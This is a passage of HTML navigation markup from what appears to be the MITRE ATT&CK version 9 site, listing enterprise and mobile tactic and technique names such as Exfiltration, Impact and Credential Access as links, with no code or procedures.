id="enterprise-TA0011-T1568-T1568.002"> <a href="/versions/v9/techniques/T1568/002/"> Domain Generation Algorithms </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1568-T1568.003"> <a href="/versions/v9/techniques/T1568/003/"> DNS Calculation </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011-T1573"> <a href="/versions/v9/techniques/T1573/"> Encrypted Channel </a> <div class="expand-button collapsed" id="enterprise-TA0011-T1573-header" data-toggle="collapse" data-target="#enterprise-TA0011-T1573-body" aria-expanded="false" aria-controls="#enterprise-TA0011-T1573-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-T1573-body" aria-labelledby="enterprise-TA0011-T1573-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1573-T1573.001"> <a href="/versions/v9/techniques/T1573/001/"> Symmetric Cryptography </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1573-T1573.002"> <a href="/versions/v9/techniques/T1573/002/"> Asymmetric Cryptography </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1008"> <a href="/versions/v9/techniques/T1008/"> Fallback Channels </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1105"> <a href="/versions/v9/techniques/T1105/"> Ingress Tool Transfer </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1104"> <a href="/versions/v9/techniques/T1104/"> Multi-Stage Channels </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1095"> <a href="/versions/v9/techniques/T1095/"> Non-Application Layer Protocol </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1571"> <a href="/versions/v9/techniques/T1571/"> Non-Standard Port </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1572"> <a href="/versions/v9/techniques/T1572/"> Protocol Tunneling </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011-T1090"> <a href="/versions/v9/techniques/T1090/"> Proxy </a> <div class="expand-button collapsed" id="enterprise-TA0011-T1090-header" data-toggle="collapse" data-target="#enterprise-TA0011-T1090-body" aria-expanded="false" aria-controls="#enterprise-TA0011-T1090-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-T1090-body" aria-labelledby="enterprise-TA0011-T1090-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1090-T1090.001"> <a href="/versions/v9/techniques/T1090/001/"> Internal Proxy </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1090-T1090.002"> <a href="/versions/v9/techniques/T1090/002/"> External Proxy </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1090-T1090.003"> <a href="/versions/v9/techniques/T1090/003/"> Multi-hop Proxy </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1090-T1090.004"> <a href="/versions/v9/techniques/T1090/004/"> Domain Fronting </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1219"> <a href="/versions/v9/techniques/T1219/"> Remote Access Software </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011-T1205"> <a href="/versions/v9/techniques/T1205/"> Traffic Signaling </a> <div class="expand-button collapsed" id="enterprise-TA0011-T1205-header" data-toggle="collapse" data-target="#enterprise-TA0011-T1205-body" aria-expanded="false" aria-controls="#enterprise-TA0011-T1205-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-T1205-body" aria-labelledby="enterprise-TA0011-T1205-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1205-T1205.001"> <a href="/versions/v9/techniques/T1205/001/"> Port Knocking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011-T1102"> <a href="/versions/v9/techniques/T1102/"> Web Service </a> <div class="expand-button collapsed" id="enterprise-TA0011-T1102-header" data-toggle="collapse" data-target="#enterprise-TA0011-T1102-body" aria-expanded="false" aria-controls="#enterprise-TA0011-T1102-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-T1102-body" aria-labelledby="enterprise-TA0011-T1102-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1102-T1102.001"> <a href="/versions/v9/techniques/T1102/001/"> Dead Drop Resolver </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1102-T1102.002"> <a href="/versions/v9/techniques/T1102/002/"> Bidirectional Communication </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1102-T1102.003"> <a href="/versions/v9/techniques/T1102/003/"> One-Way Communication </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0010"> <a href="/versions/v9/tactics/TA0010"> Exfiltration </a> <div class="expand-button collapsed" id="enterprise-TA0010-header" data-toggle="collapse" data-target="#enterprise-TA0010-body" aria-expanded="false" aria-controls="#enterprise-TA0010-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0010-body" aria-labelledby="enterprise-TA0010-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0010-T1020"> <a href="/versions/v9/techniques/T1020/"> Automated Exfiltration </a> <div class="expand-button collapsed" id="enterprise-TA0010-T1020-header" data-toggle="collapse" data-target="#enterprise-TA0010-T1020-body" aria-expanded="false" aria-controls="#enterprise-TA0010-T1020-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0010-T1020-body" aria-labelledby="enterprise-TA0010-T1020-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0010-T1020-T1020.001"> <a href="/versions/v9/techniques/T1020/001/"> Traffic Duplication </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0010-T1030"> <a href="/versions/v9/techniques/T1030/"> Data Transfer Size Limits </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0010-T1048"> <a href="/versions/v9/techniques/T1048/"> Exfiltration Over Alternative Protocol </a> <div class="expand-button collapsed" id="enterprise-TA0010-T1048-header" data-toggle="collapse" data-target="#enterprise-TA0010-T1048-body" aria-expanded="false" aria-controls="#enterprise-TA0010-T1048-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0010-T1048-body" aria-labelledby="enterprise-TA0010-T1048-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0010-T1048-T1048.001"> <a href="/versions/v9/techniques/T1048/001/"> Exfiltration Over Symmetric Encrypted Non-C2 Protocol </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0010-T1048-T1048.002"> <a href="/versions/v9/techniques/T1048/002/"> Exfiltration Over Asymmetric Encrypted Non-C2 Protocol </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0010-T1048-T1048.003"> <a href="/versions/v9/techniques/T1048/003/"> Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0010-T1041"> <a href="/versions/v9/techniques/T1041/"> Exfiltration Over C2 Channel </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0010-T1011"> <a href="/versions/v9/techniques/T1011/"> Exfiltration Over Other Network Medium </a> <div class="expand-button collapsed" id="enterprise-TA0010-T1011-header" data-toggle="collapse" data-target="#enterprise-TA0010-T1011-body" aria-expanded="false" aria-controls="#enterprise-TA0010-T1011-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0010-T1011-body" aria-labelledby="enterprise-TA0010-T1011-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0010-T1011-T1011.001"> <a href="/versions/v9/techniques/T1011/001/"> Exfiltration Over Bluetooth </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0010-T1052"> <a href="/versions/v9/techniques/T1052/"> Exfiltration Over Physical Medium </a> <div class="expand-button collapsed" id="enterprise-TA0010-T1052-header" data-toggle="collapse" data-target="#enterprise-TA0010-T1052-body" aria-expanded="false" aria-controls="#enterprise-TA0010-T1052-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0010-T1052-body" aria-labelledby="enterprise-TA0010-T1052-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0010-T1052-T1052.001"> <a href="/versions/v9/techniques/T1052/001/"> Exfiltration over USB </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0010-T1567"> <a href="/versions/v9/techniques/T1567/"> Exfiltration Over Web Service </a> <div class="expand-button collapsed" id="enterprise-TA0010-T1567-header" data-toggle="collapse" data-target="#enterprise-TA0010-T1567-body" aria-expanded="false" aria-controls="#enterprise-TA0010-T1567-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0010-T1567-body" aria-labelledby="enterprise-TA0010-T1567-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0010-T1567-T1567.001"> <a href="/versions/v9/techniques/T1567/001/"> Exfiltration to Code Repository </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0010-T1567-T1567.002"> <a href="/versions/v9/techniques/T1567/002/"> Exfiltration to Cloud Storage </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0010-T1029"> <a href="/versions/v9/techniques/T1029/"> Scheduled Transfer </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0010-T1537"> <a href="/versions/v9/techniques/T1537/"> Transfer Data to Cloud Account </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0040"> <a href="/versions/v9/tactics/TA0040"> Impact </a> <div class="expand-button collapsed" id="enterprise-TA0040-header" data-toggle="collapse" data-target="#enterprise-TA0040-body" aria-expanded="false" aria-controls="#enterprise-TA0040-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0040-body" aria-labelledby="enterprise-TA0040-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1531"> <a href="/versions/v9/techniques/T1531/"> Account Access Removal </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1485"> <a href="/versions/v9/techniques/T1485/"> Data Destruction </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1486"> <a href="/versions/v9/techniques/T1486/"> Data Encrypted for Impact </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0040-T1565"> <a href="/versions/v9/techniques/T1565/"> Data Manipulation </a> <div class="expand-button collapsed" id="enterprise-TA0040-T1565-header" data-toggle="collapse" data-target="#enterprise-TA0040-T1565-body" aria-expanded="false" aria-controls="#enterprise-TA0040-T1565-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0040-T1565-body" aria-labelledby="enterprise-TA0040-T1565-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1565-T1565.001"> <a href="/versions/v9/techniques/T1565/001/"> Stored Data Manipulation </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1565-T1565.002"> <a href="/versions/v9/techniques/T1565/002/"> Transmitted Data Manipulation </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1565-T1565.003"> <a href="/versions/v9/techniques/T1565/003/"> Runtime Data Manipulation </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0040-T1491"> <a href="/versions/v9/techniques/T1491/"> Defacement </a> <div class="expand-button collapsed" id="enterprise-TA0040-T1491-header" data-toggle="collapse" data-target="#enterprise-TA0040-T1491-body" aria-expanded="false" aria-controls="#enterprise-TA0040-T1491-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0040-T1491-body" aria-labelledby="enterprise-TA0040-T1491-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1491-T1491.001"> <a href="/versions/v9/techniques/T1491/001/"> Internal Defacement </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1491-T1491.002"> <a href="/versions/v9/techniques/T1491/002/"> External Defacement </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0040-T1561"> <a href="/versions/v9/techniques/T1561/"> Disk Wipe </a> <div class="expand-button collapsed" id="enterprise-TA0040-T1561-header" data-toggle="collapse" data-target="#enterprise-TA0040-T1561-body" aria-expanded="false" aria-controls="#enterprise-TA0040-T1561-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0040-T1561-body" aria-labelledby="enterprise-TA0040-T1561-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1561-T1561.001"> <a href="/versions/v9/techniques/T1561/001/"> Disk Content Wipe </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1561-T1561.002"> <a href="/versions/v9/techniques/T1561/002/"> Disk Structure Wipe </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0040-T1499"> <a href="/versions/v9/techniques/T1499/"> Endpoint Denial of Service </a> <div class="expand-button collapsed" id="enterprise-TA0040-T1499-header" data-toggle="collapse" data-target="#enterprise-TA0040-T1499-body" aria-expanded="false" aria-controls="#enterprise-TA0040-T1499-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0040-T1499-body" aria-labelledby="enterprise-TA0040-T1499-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1499-T1499.001"> <a href="/versions/v9/techniques/T1499/001/"> OS Exhaustion Flood </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1499-T1499.002"> <a href="/versions/v9/techniques/T1499/002/"> Service Exhaustion Flood </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1499-T1499.003"> <a href="/versions/v9/techniques/T1499/003/"> Application Exhaustion Flood </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1499-T1499.004"> <a href="/versions/v9/techniques/T1499/004/"> Application or System Exploitation </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1495"> <a href="/versions/v9/techniques/T1495/"> Firmware Corruption </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1490"> <a href="/versions/v9/techniques/T1490/"> Inhibit System Recovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0040-T1498"> <a href="/versions/v9/techniques/T1498/"> Network Denial of Service </a> <div class="expand-button collapsed" id="enterprise-TA0040-T1498-header" data-toggle="collapse" data-target="#enterprise-TA0040-T1498-body" aria-expanded="false" aria-controls="#enterprise-TA0040-T1498-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0040-T1498-body" aria-labelledby="enterprise-TA0040-T1498-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1498-T1498.001"> <a href="/versions/v9/techniques/T1498/001/"> Direct Network Flood </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1498-T1498.002"> <a href="/versions/v9/techniques/T1498/002/"> Reflection Amplification </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1496"> <a href="/versions/v9/techniques/T1496/"> Resource Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1489"> <a href="/versions/v9/techniques/T1489/"> Service Stop </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0040-T1529"> <a href="/versions/v9/techniques/T1529/"> System Shutdown/Reboot </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="mobile"> <a href="/versions/v9/techniques/mobile/"> Mobile </a> <div class="expand-button collapsed" id="mobile-header" data-toggle="collapse" data-target="#mobile-body" aria-expanded="false" aria-controls="#mobile-body"></div> </div> <div class="sidenav-body collapse" id="mobile-body" aria-labelledby="mobile-header"> <div class="sidenav"> <div class="sidenav-head " id="mobile-TA0027"> <a href="/versions/v9/tactics/TA0027"> Initial Access </a> <div class="expand-button collapsed" id="mobile-TA0027-header" data-toggle="collapse" data-target="#mobile-TA0027-body" aria-expanded="false" aria-controls="#mobile-TA0027-body"></div> </div> <div class="sidenav-body collapse" id="mobile-TA0027-body" aria-labelledby="mobile-TA0027-header"> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0027-T1475"> <a href="/versions/v9/techniques/T1475/"> Deliver Malicious App via Authorized App Store </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0027-T1476"> <a href="/versions/v9/techniques/T1476/"> Deliver Malicious App via Other Means </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0027-T1456"> <a href="/versions/v9/techniques/T1456/"> Drive-by Compromise </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0027-T1458"> <a href="/versions/v9/techniques/T1458/"> Exploit via Charging Station or PC </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0027-T1477"> <a href="/versions/v9/techniques/T1477/"> Exploit via Radio Interfaces </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0027-T1478"> <a href="/versions/v9/techniques/T1478/"> Install Insecure or Malicious Configuration </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0027-T1461"> <a href="/versions/v9/techniques/T1461/"> Lockscreen Bypass </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0027-T1444"> <a href="/versions/v9/techniques/T1444/"> Masquerade as Legitimate Application </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0027-T1474"> <a href="/versions/v9/techniques/T1474/"> Supply Chain Compromise </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="mobile-TA0041"> <a href="/versions/v9/tactics/TA0041"> Execution </a> <div class="expand-button collapsed" id="mobile-TA0041-header" data-toggle="collapse" data-target="#mobile-TA0041-body" aria-expanded="false" aria-controls="#mobile-TA0041-body"></div> </div> <div class="sidenav-body collapse" id="mobile-TA0041-body" aria-labelledby="mobile-TA0041-header"> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0041-T1402"> <a href="/versions/v9/techniques/T1402/"> Broadcast Receivers </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0041-T1605"> <a href="/versions/v9/techniques/T1605/"> Command-Line Interface </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0041-T1575"> <a href="/versions/v9/techniques/T1575/"> Native Code </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0041-T1603"> <a href="/versions/v9/techniques/T1603/"> Scheduled Task/Job </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="mobile-TA0028"> <a href="/versions/v9/tactics/TA0028"> Persistence </a> <div class="expand-button collapsed" id="mobile-TA0028-header" data-toggle="collapse" data-target="#mobile-TA0028-body" aria-expanded="false" aria-controls="#mobile-TA0028-body"></div> </div> <div class="sidenav-body collapse" id="mobile-TA0028-body" aria-labelledby="mobile-TA0028-header"> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0028-T1402"> <a href="/versions/v9/techniques/T1402/"> Broadcast Receivers </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0028-T1540"> <a href="/versions/v9/techniques/T1540/"> Code Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0028-T1577"> <a href="/versions/v9/techniques/T1577/"> Compromise Application Executable </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0028-T1541"> <a href="/versions/v9/techniques/T1541/"> Foreground Persistence </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0028-T1403"> <a href="/versions/v9/techniques/T1403/"> Modify Cached Executable Code </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0028-T1398"> <a href="/versions/v9/techniques/T1398/"> Modify OS Kernel or Boot Partition </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0028-T1400"> <a href="/versions/v9/techniques/T1400/"> Modify System Partition </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0028-T1399"> <a href="/versions/v9/techniques/T1399/"> Modify Trusted Execution Environment </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0028-T1603"> <a href="/versions/v9/techniques/T1603/"> Scheduled Task/Job </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="mobile-TA0029"> <a href="/versions/v9/tactics/TA0029"> Privilege Escalation </a> <div class="expand-button collapsed" id="mobile-TA0029-header" data-toggle="collapse" data-target="#mobile-TA0029-body" aria-expanded="false" aria-controls="#mobile-TA0029-body"></div> </div> <div class="sidenav-body collapse" id="mobile-TA0029-body" aria-labelledby="mobile-TA0029-header"> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0029-T1540"> <a href="/versions/v9/techniques/T1540/"> Code Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0029-T1401"> <a href="/versions/v9/techniques/T1401/"> Device Administrator Permissions </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0029-T1404"> <a href="/versions/v9/techniques/T1404/"> Exploit OS Vulnerability </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0029-T1405"> <a href="/versions/v9/techniques/T1405/"> Exploit TEE Vulnerability </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="mobile-TA0030"> <a href="/versions/v9/tactics/TA0030"> Defense Evasion </a> <div class="expand-button collapsed" id="mobile-TA0030-header" data-toggle="collapse" data-target="#mobile-TA0030-body" aria-expanded="false" aria-controls="#mobile-TA0030-body"></div> </div> <div class="sidenav-body collapse" id="mobile-TA0030-body" aria-labelledby="mobile-TA0030-header"> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1418"> <a href="/versions/v9/techniques/T1418/"> Application Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1540"> <a href="/versions/v9/techniques/T1540/"> Code Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1447"> <a href="/versions/v9/techniques/T1447/"> Delete Device Data </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1446"> <a href="/versions/v9/techniques/T1446/"> Device Lockout </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1408"> <a href="/versions/v9/techniques/T1408/"> Disguise Root/Jailbreak Indicators </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1407"> <a href="/versions/v9/techniques/T1407/"> Download New Code at Runtime </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1523"> <a href="/versions/v9/techniques/T1523/"> Evade Analysis Environment </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1581"> <a href="/versions/v9/techniques/T1581/"> Geofencing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1516"> <a href="/versions/v9/techniques/T1516/"> Input Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1478"> <a href="/versions/v9/techniques/T1478/"> Install Insecure or Malicious Configuration </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1444"> <a href="/versions/v9/techniques/T1444/"> Masquerade as Legitimate Application </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1398"> <a href="/versions/v9/techniques/T1398/"> Modify OS Kernel or Boot Partition </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1400"> <a href="/versions/v9/techniques/T1400/"> Modify System Partition </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1399"> <a href="/versions/v9/techniques/T1399/"> Modify Trusted Execution Environment </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1575"> <a href="/versions/v9/techniques/T1575/"> Native Code </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1406"> <a href="/versions/v9/techniques/T1406/"> Obfuscated Files or Information </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1604"> <a href="/versions/v9/techniques/T1604/"> Proxy Through Victim </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1508"> <a href="/versions/v9/techniques/T1508/"> Suppress Application Icon </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0030-T1576"> <a href="/versions/v9/techniques/T1576/"> Uninstall Malicious Application </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="mobile-TA0031"> <a href="/versions/v9/tactics/TA0031"> Credential Access </a> <div class="expand-button collapsed" id="mobile-TA0031-header" data-toggle="collapse" data-target="#mobile-TA0031-body" aria-expanded="false" aria-controls="#mobile-TA0031-body"></div> </div> <div class="sidenav-body collapse" id="mobile-TA0031-body" aria-labelledby="mobile-TA0031-header"> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0031-T1517"> <a href="/versions/v9/techniques/T1517/"> Access Notifications </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0031-T1413"> <a href="/versions/v9/techniques/T1413/"> Access Sensitive Data in Device Logs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0031-T1409"> <a href="/versions/v9/techniques/T1409/"> Access Stored Application Data </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0031-T1414"> <a href="/versions/v9/techniques/T1414/"> Capture Clipboard Data </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0031-T1412"> <a href="/versions/v9/techniques/T1412/"> Capture SMS Messages </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0031-T1405"> <a href="/versions/v9/techniques/T1405/"> Exploit TEE Vulnerability </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0031-T1417"> <a href="/versions/v9/techniques/T1417/"> Input Capture </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0031-T1411"> <a href="/versions/v9/techniques/T1411/"> Input Prompt </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0031-T1579"> <a href="/versions/v9/techniques/T1579/"> Keychain </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0031-T1410"> <a href="/versions/v9/techniques/T1410/"> Network Traffic Capture or Redirection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0031-T1416"> <a href="/versions/v9/techniques/T1416/"> URI Hijacking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="mobile-TA0032"> <a href="/versions/v9/tactics/TA0032"> Discovery </a> <div class="expand-button collapsed" id="mobile-TA0032-header" data-toggle="collapse" data-target="#mobile-TA0032-body" aria-expanded="false" aria-controls="#mobile-TA0032-body"></div> </div> <div class="sidenav-body collapse" id="mobile-TA0032-body" aria-labelledby="mobile-TA0032-header"> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0032-T1418"> <a href="/versions/v9/techniques/T1418/"> Application Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0032-T1523"> <a href="/versions/v9/techniques/T1523/"> Evade Analysis Environment </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0032-T1420"> <a href="/versions/v9/techniques/T1420/"> File and Directory Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0032-T1430"> <a href="/versions/v9/techniques/T1430/"> Location Tracking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0032-T1423"> <a href="/versions/v9/techniques/T1423/"> Network Service Scanning </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0032-T1424"> <a href="/versions/v9/techniques/T1424/"> Process Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0032-T1426"> <a href="/versions/v9/techniques/T1426/"> System Information Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0032-T1422"> <a href="/versions/v9/techniques/T1422/"> System Network Configuration Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0032-T1421"> <a href="/versions/v9/techniques/T1421/"> System Network Connections Discovery </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="mobile-TA0033"> <a href="/versions/v9/tactics/TA0033"> Lateral Movement </a> <div class="expand-button collapsed" id="mobile-TA0033-header" data-toggle="collapse" data-target="#mobile-TA0033-body" aria-expanded="false" aria-controls="#mobile-TA0033-body"></div> </div> <div class="sidenav-body collapse" id="mobile-TA0033-body" aria-labelledby="mobile-TA0033-header"> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0033-T1427"> <a href="/versions/v9/techniques/T1427/"> Attack PC via USB Connection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0033-T1428"> <a href="/versions/v9/techniques/T1428/"> Exploit Enterprise Resources </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="mobile-TA0035"> <a href="/versions/v9/tactics/TA0035"> Collection </a> <div class="expand-button 